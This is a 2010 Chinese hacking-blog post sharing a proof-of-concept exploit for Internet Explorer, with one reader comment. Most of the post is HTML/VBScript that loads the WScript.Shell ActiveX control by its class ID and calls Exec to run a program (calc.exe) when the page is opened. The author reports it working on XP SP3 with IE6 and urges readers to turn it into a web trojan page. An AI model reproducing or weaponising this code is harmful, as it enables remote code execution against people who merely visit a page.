又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)

date 2010年01月19日 | category 工具收集| 坏人咖啡

这段代码在SP3+IE6下测试成功

测试代码:


<html>

<p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</font></b></p>

<p>

<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>

<script language='vbscript'>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1

</script></p>

有兴趣的同学可以回去搞一下,弄个网马出来!

所属分类: 工具收集
Tags: ,
订阅到我的书签:
Google QQ 鲜果 有道 抓虾 九点 雅虎 哪吒


1 条评论 »

  1. 评论 by:
    流浪的风

    很强大,还真能跳出计算器呢,看来IE还真不安全。。。

这篇文章上的评论 RSS feed TrackBack URI

发表评论

(必需)

(必需)